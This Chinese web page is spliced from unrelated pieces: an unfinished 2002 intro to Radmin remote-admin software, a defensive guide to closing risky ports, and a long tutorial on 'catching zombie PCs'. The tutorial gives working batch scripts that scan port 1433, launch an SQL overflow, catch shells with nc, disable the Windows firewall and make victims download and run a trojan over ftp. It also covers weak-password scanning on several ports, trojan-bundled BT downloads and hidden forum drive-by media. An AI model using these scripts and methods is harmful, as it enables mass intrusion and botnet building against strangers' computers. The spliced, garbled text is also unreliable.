Remote Administrator

远程控制全接触(4)——远程管理服务器的利刃Remote Administrator
（作者：凌巍 2002年07月17日 15:16）
在上一章中，我们已经见识了Pcanywhere 的强大威力。然而，我们会发觉，Pcanywhere也并非十全十美，也有其内在的缺点。譬如说：安装软件包过大，下载不易；设置界面选项繁多，使得初学者一时不易掌握；控制端界面的终端窗口刷新速度过慢，远程 *** 作在网络状况不好的情况下易受延迟等等。
因此，当我们面临第一章所提到的第三个问题 —— 要对服务器进行远程管理之时，尽管Pcanywhere也能做到，但还有更为优秀的远程控制软件以供我们选择。而素有“远程管理员”之称的Remote Administrator就正是这样一款专为远程管理Windows NT/2000/XP服务器而量身定做的远程控制软件。
Remote Administrator的下载地址是>近来黑客攻击事件频频发生，我们身边的朋友也不断有QQ、E-mail和游戏账号被盗事件发生。现在的黑客技术有朝着大众化方向发展的趋势，能够掌握攻击他人系统技术的人越来越多了，只要你的电脑稍微有点系统Bug或者安装了有问题的应用程序，就有可能成为他人的肉鸡。如何给一台上网的机器查漏洞并做出相应的处理呢
一、要命的端口
计算机要与外界进行通信，必须通过一些端口。别人要想入侵和控制我们的电脑，也要从某些端口连接进来。某日笔者查看了一位朋友的系统，吃惊地发现开放了139、445、3389、4899等重要端口，要知道这些端口都可以为黑客入侵提供便利，尤其是4899，可能是入侵者安装的后门工具Radmin打开的，他可以通过这个端口取得系统的完全控制权。
在Windows 98下，通过“开始”选取“运行”，然后输入“command”(Windows 2000/XP/2003下在“运行”中输入“cmd”)，进入命令提示窗口，然后输入netstat/an，就可以看到本机端口开放和网络连接情况。
那怎么关闭这些端口呢因为计算机的每个端口都对应着某个服务或者应用程序，因此只要我们停止该服务或者卸载该程序，这些端口就自动关闭了。例如可以在“我的电脑 →控制面板→计算机管理→服务”中停止Radmin服务，就可以关闭4899端口了。
如果暂时没有找到打开某端口的服务或者停止该项服务可能会影响计算机的正常使用，我们也可以利用防火墙来屏蔽端口。以天网个人防火墙关闭4899端口为例。打开天网“自定义IP规则”界面，点击“增加规则”添加一条新的规则，在“数据包方向”中选择“接受”，在“对方IP地址”中选择“任何地址”，在TCP选项卡的本地端口中填写从4899到0，对方端口填写从0到0，在“当满足上面条件时”中选择“拦截”，这样就可以关闭4899端口了。其他的端口关闭方法可以此类推。
二、敌人的“进程”
在Windows 2000下，可以通过同时按下“Ctrl+Alt+Del”键调出任务管理器来查看和关闭进程;但在Windows 98下按“Ctrl+Alt+del”键只能看到部分应用程序，有些服务级的进程却被隐藏因而无法看到了，不过通过系统自带的工具msinfo32还是可以看到的。在“开始→运行”里输入msinfo32，打开“Microsoft 系统信息”界面，在“软件环境”的“正在运行任务”下可以看到本机的进程。但是在Windows 98下要想终止进程，还是得通过第三方的工具。很多系统优化软件都带有查看和关闭进程的工具，如春光系统修改器等。
但目前很多木马进程都会伪装系统进程，新手朋友很难分辨其真伪，所以这里推荐一款强大的杀木马工具——“木马克星”，它可以查杀8000多种国际木马，1000多种密码偷窃木马，功能十分强大，实在是安全上网的必备工具!
三、小心，远程管理软件有大麻烦
现在很多人都喜欢在自己的机器上安装远程管理软件，如Pcanywhere、Radmin、VNC或者Windows自带的远程桌面，这确实方便了远程管理维护和办公，但同时远程管理软件也给我们带来了很多安全隐患。例如Pcanywhere 100版本及更早的版本存在着口令文件CIF容易被解密(解码而非爆破)的问题，一旦入侵者通过某种途径得到了CIF文件，他就可以用一款叫做Pcanywherepwd的工具破解出管理员账号和密码。

抓肉鸡的11种方法
首先得准备，免杀的STAT 或 一只免杀鸽子或者其他的远控，一个免费空间，一些工具（下面会提到）
（1）
扫3389端口抓肉鸡
（适合新手）（抓不了国外肉鸡）
现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。
（2）
扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135）
（3）
扫445端口抓肉鸡
和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索445）
（4）
1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡
要用到的工具：S扫 sqlhelloexe ncexe批处理文件
首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出bat文件
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tttxt) do sexe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Resulttxt) do sqlhello %%i 1433 xxxxxxxxxx 556
还要新建一个tttxt，里面你要扫的IP段，格式为XXXXXXXXXXXX XXXXXXXXXXXX,中间是空格
1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxxxxxxxxx 556 这个里的XXX添你的IP，556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556<nctxt&&%0 这里的556要和上面的保持一致，你也可以改成其他的值，但是2处都要改，然后保存为ncbat
然后再新建一个nctxt,里面填写溢出成功后让肉鸡下载你木马的代码。
这里给出一种代码
echo open XXXX(你FTP的IP)>>daimatxt
echo username>>daimatxt
echo password>>daimatxt
echo bin>>daimatxt(以2进制传输数据)
echo get xxxexe(你的木马的文件名,要放在根目录下)>>daimatxt
echo bye>>daimatxt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daimatxt
xxxexe(也是填你木马的文件名)
del daimatxt
注意上面的代码回车符别删掉，要不然就没法下你的马了。
上面的步骤都搞好后，就可以开始扫肉鸡了。
先打开多个NCbat,然后再打开扫描+溢出bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。
忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。
先休息一下，打这么多字累死了
继续
（5）
扫1433抓肉鸡之方法2
要用到的工具：端口扫描器 X-scanSQL综合利用工具
上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了。
（6）
用WINNTAutoAttack扫SA弱口令抓肉鸡
工具：WINNTAutoAttack SQL综合利用工具
打开WINNTAutoAttack，找一段IP添上，然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号，接着开始扫描，扫完后，用 SQL综合利用工具连上传马执行就好了。
（7）
扫4899空口令抓肉鸡
工具：端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口，然后用4899探测器导入开了4899端口的IP，接着扫空令，最后用Radmin连接有空口令的机器，带开文件管理，上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899
（8）
扫5900端口抓VNC肉鸡
工具：VNC扫描器 VNC连接器
首先用VNC扫描器扫描一段IP，扫描格式为vscanexe（扫描器文件名） -i 219000-219255255255（扫描IP段） -p 5900 -vnc -vv
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接，下面就不用多说了吧？ 详细动画可以去黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。方法有很多，比如BT挂马、免费空间挂马、迅雷挂马等等，有些我也还不会，呵呵。下面就介绍几种我会的。
（9）
BT挂马
顾名思义，就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好，而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些**、音乐、游戏捆绑在一起，再压缩成RAR文件发布，谁在开始下载时会知道RAR里有木马呢？当他费了好大劲下载完，打开发现是EXE的格式后，总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧？尤其是下XXX片的时候当然你也可以做个网页木马，然后把你网页木马的地址插入到你发布的文件中（不是所有文件都可以这样的，我只知道RM和EXE文件可以插入），别人下载打开后同时也会带开你的网页木马，如果他的系统没有补供你网页木马所利用的漏洞的话，那他就会中你的马了。有些朋友可能会想，我把木马和其他文件捆绑后格式保持为那个文件（比如RM捆绑木马后保持RM格式），那样别人不就不会怀疑了吗？呵呵，如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布，那样你肉鸡不抓疯了才怪~~所以在这里说一下，木马和其他文件捆绑后生成的文件只能为EXE格式的，除非你有你所捆绑文件的格式的溢出漏洞，那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少，大多都被补了，就算有别人也不一定会公开，为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞，针对winrar36版本以下的所有版本，只要你winrar版本低于36，运行绑了牧马的RAR文件后就会中马。此类木马症状为：运行RAR文件后会d出一个什么什么损坏还是错误的对话框，然后RAR文件体积变小，减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常，不会d出错误对话框。在这里提醒下各位赶快更新下WINRAR版本，小心中马哈。
（10）
免费空间挂马
其实和BT差不多，就是把做好的木马上传到你申请的免费空间，然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子，那样不仅要开着电脑，还影响网速。我这几天就是这样挂的，弄个免费空间，上传个木马，到2个XXX论坛发个帖子，每天睡前一顶，才挂了几天，现在每天肉鸡都保持在40-60只。而且大部分都是美国的
（11）
用RM在论坛挂马
首先你弄个只有几秒钟的RM文件，然后插入你的网页木马，接着上传到你的空间，然后到一些支持插入RM连接的论坛发帖子，点插入real media 播放器，输入你的RM牧马地址，然后高度宽度都设为1（这部是为了保证隐蔽性 ），然后点发贴，这样别人在浏览你的帖子就会运行你的RM木马，而我们前面把高和宽设为1，在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的，我没试过，大家可以去研究下。

---